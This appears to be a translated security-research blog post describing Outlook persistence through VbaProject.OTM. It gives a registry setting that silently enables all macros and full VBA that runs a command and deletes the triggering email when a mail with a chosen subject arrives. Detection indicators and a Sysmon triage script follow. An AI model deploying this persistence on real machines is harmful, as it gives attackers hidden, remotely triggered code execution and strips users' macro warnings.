
Persistence method of low authority based on Outlook mail

In this article, we focus on analyzing an Outlook persistence technique we recently discovered. So far, it has not received much attention from blue teams.

0x00 overview

Persistence techniques that a low-privileged user can establish in user space are often very valuable, because such scenarios are far more common than those with elevated privileges. We therefore keep researching techniques that are not widely documented and may not be monitored by blue teams. Last year we published three persistence-related articles; in this one we continue the discussion, focusing on an Outlook persistence technique we recently discovered. So far, it has not received much attention from blue teams.

Several researchers have already studied Outlook-based persistence, including Dave Hartley and Nick Landers, who described in detail how Outlook rules can be used to achieve persistence.

In this article, we focus on using Outlook’s VbaProject.OTM file to achieve a similar result. Although the technique has not spread widely, Cobalt Kitty has previously used it for a command-and-control channel.

0x01 analysis

Like most Microsoft Office applications, Outlook can enable the “Developer” tab and create VBA macros through the VB editor. We open the editor and create a simple macro in the Outlook-specific module named “ThisOutlookSession”.

(Screenshot: the macro in the Outlook VB editor)

After saving the macro, Outlook creates the VbaProject.OTM file in the %APPDATA%\Roaming\Microsoft\Outlook directory.

(Screenshot: VbaProject.OTM in the Outlook profile directory)

However, if we try to execute the macro with the default configuration, a failure prompt appears, because the default setting is “provide notifications for digitally signed macros, and disable all other macros”.

However, we can change this configuration by creating an Outlook Security registry key with the following values.

(Screenshot: the Outlook Security registry key and its Level value in regedit)

In the security configuration, the Level value is defined as follows:

4 = No notification is provided, all macros are disabled

3 = Provide notification for digitally signed macros, disable all other macros

2 = Provide notifications for all macros

1 = Enable all macros

To let macros run silently, without notifying the user, we need to set the Level value to 1, which enables all macros.

Checking the VbaProject.OTM file, we found that it is a standard Microsoft Compound Document File (CDF):

$ file ~/VbaProject.OTM
VbaProject.OTM: Composite Document File V2 Document, Cannot read section info

Using oledump.py to analyze it further, we can find the OLE stream containing the code (the M flag marks a stream that holds a VBA macro):

$ python oledump.py ~/VbaProject.OTM
  1:        43 'OutlookProjectData'
  2:       388 'OutlookVbaData/PROJECT'
  3:        59 'OutlookVbaData/PROJECTwm'
  4: M    6156 'OutlookVbaData/VBA/ThisOutlookSession'
  5:      2663 'OutlookVbaData/VBA/_VBA_PROJECT'
  6:       497 'OutlookVbaData/VBA/dir'

At this point we know that VbaProject.OTM is a standard OLE document with macros enabled, so the traditional tools and techniques for creating, obfuscating, purging, and reloading such files still apply. When writing it to disk, we need to keep in mind how it looks to static analysis.

Next, let us take a closer look at how to use it as a weaponized persistence tool.

0x02 Weaponization

For VBA code execution to be useful, the code needs to run in response to an event. The ThisOutlookSession module lets us subscribe to many different Outlook events, each of which offers a different opportunity for code execution.

The persistence method discussed here may be driven by user events (for example, opening Outlook) or by attacker-controlled events (for example, receiving a specific email). Here we focus on the latter and explain how to achieve arbitrary VBA execution using emails with a specific subject.

To know when new mail arrives, we first subscribe to the events of the default inbox when Outlook starts. We declare a variable with events for the items of the default inbox folder (olInboxItems) and set it in the startup handler:

Option Explicit
Private WithEvents olInboxItems As Items

Private Sub Application_Startup()
    Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).Items
End Sub

Then, through this reference to the inbox items, we use the “ItemAdd” callback to receive an event whenever new mail arrives:

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)
End Sub

Specifically, we are only interested in received emails, so we refine the callback so that it only fires for mail items. This is done by checking whether the item’s type is “MailItem”.

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)
    If TypeOf Item Is MailItem Then
        MsgBox "You have mail"
    End If
End Sub

Of course, we do not want to execute it every time an email is received, so we can filter incoming mail on specific conditions, such as sender address, subject, or body content. Below, the code is extended so that when an email with a specific subject (MailItem.Subject) arrives, the code runs and the email is then deleted using the MailItem.Delete method.

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)
    On Error Resume Next
    Dim olMailItem As MailItem
    If TypeOf Item Is MailItem Then
        ' Bind the typed reference first; otherwise olMailItem.Subject is never read
        Set olMailItem = Item
        If InStr(olMailItem.Subject, "MDSec") > 0 Then
            MsgBox "Hack The Planet"
            olMailItem.Delete
        End If
    End If
    Set Item = Nothing
    Set olMailItem = Nothing
End Sub

Combining the above code gives a macro that pops up the calculator when the matching email arrives:

Option Explicit
Private WithEvents olInboxItems As Items

Private Sub Application_Startup()
    Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).Items
End Sub

Private Sub olInboxItems_ItemAdd(ByVal Item As Object)
    On Error Resume Next
    Dim olMailItem As MailItem
    If TypeOf Item Is MailItem Then
        ' Bind the typed reference first; otherwise olMailItem.Subject is never read
        Set olMailItem = Item
        If InStr(olMailItem.Subject, "MDSec") > 0 Then
            MsgBox "Hack The Planet"
            Shell "calc.exe"
            olMailItem.Delete
        End If
    End If
    Set Item = Nothing
    Set olMailItem = Nothing
End Sub

Demo video: https://vimeo.com/482370663

The pop-up calculator is only a proof of concept; in practice the same trigger can run a fully weaponized payload. The specific implementation is left for readers to try.

Demo video: https://vimeo.com/482376266

0x03 detection

From the endpoint security perspective, the technique can be detected through the following two key indicators:

1. Monitoring the creation and modification events of %APPDATA%\Roaming\Microsoft\Outlook\VbaProject.OTM file (Sysmon event ID 11);

2. Monitoring the creation and modification events of the registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security key and Level value (Sysmon event ID 12).
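As an added defender-side example (not part of the original article), the following Python evaluates constructed Sysmon-style events against the two indicators above and interprets the Level values listed in the analysis section; the user name, SID, process paths and events are made up. Two caveats it encodes: Sysmon records a registry value write as event ID 13 (key creation or deletion is ID 12), and OUTLOOK.EXE itself writes VbaProject.OTM when a user legitimately saves a macro, so the writing process matters.

```python
import re

# Meaning of the Outlook Security\Level value, as listed in the analysis section.
LEVEL_MEANING = {
    4: "no notification, all macros disabled",
    3: "notify for signed macros, disable all others (default)",
    2: "notify for all macros",
    1: "enable all macros, no notification",
}

# Sysmon: 11 = FileCreate, 12 = registry key create/delete, 13 = registry value set.
# %APPDATA% already expands to ...\AppData\Roaming, so match on the profile-relative tail.
OTM_PATH = re.compile(r"\\Microsoft\\Outlook\\VbaProject\.OTM$", re.IGNORECASE)
SECURITY_KEY = re.compile(r"\\Software\\Microsoft\\Office\\\d+\.\d+\\Outlook\\Security(\\Level)?$", re.IGNORECASE)

def parse_dword(details):
    """Parse a Sysmon Details string such as 'DWORD (0x00000001)' into an int (or None)."""
    m = re.search(r"DWORD\s*\((0x[0-9a-fA-F]+)\)", details or "")
    return int(m.group(1), 16) if m else None

def evaluate(event):
    """Return (severity, reason) for one Sysmon event dict, or None if it is not relevant."""
    eid, image = event.get("EventID"), event.get("Image", "")
    if eid == 11 and OTM_PATH.search(event.get("TargetFilename", "")):
        # Outlook writes this file itself when a user saves a macro; any other writer is worse.
        sev = "medium" if image.lower().endswith("\\outlook.exe") else "high"
        return sev, f"VbaProject.OTM written by {image}"
    if eid in (12, 13) and SECURITY_KEY.search(event.get("TargetObject", "")):
        if eid == 12:
            return "medium", f"Outlook Security key {event.get('EventType')} by {image}"
        level = parse_dword(event.get("Details"))
        sev = "critical" if level == 1 else "medium"
        return sev, f"Outlook macro Level set to {level} ({LEVEL_MEANING.get(level, 'unknown')}) by {image}"
    return None

def triage(events):
    """Run evaluate() over a list of events and keep the hits, in input order."""
    return [(e, r) for e in events if (r := evaluate(e))]

# Constructed sample events (not real telemetry); the SID, user name and paths are made up.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\alice\AppData\Local\Temp\setup.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Outlook\VbaProject.OTM"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\regedit.exe", "Details": "DWORD (0x00000001)",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Office\16.0\Outlook\Security\Level"},
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Office\16.0\Outlook\Options\General\Foo",
     "Details": "DWORD (0x00000000)"},
]
```

The third sample event is ordinary Outlook settings noise under the same hive and is deliberately not flagged.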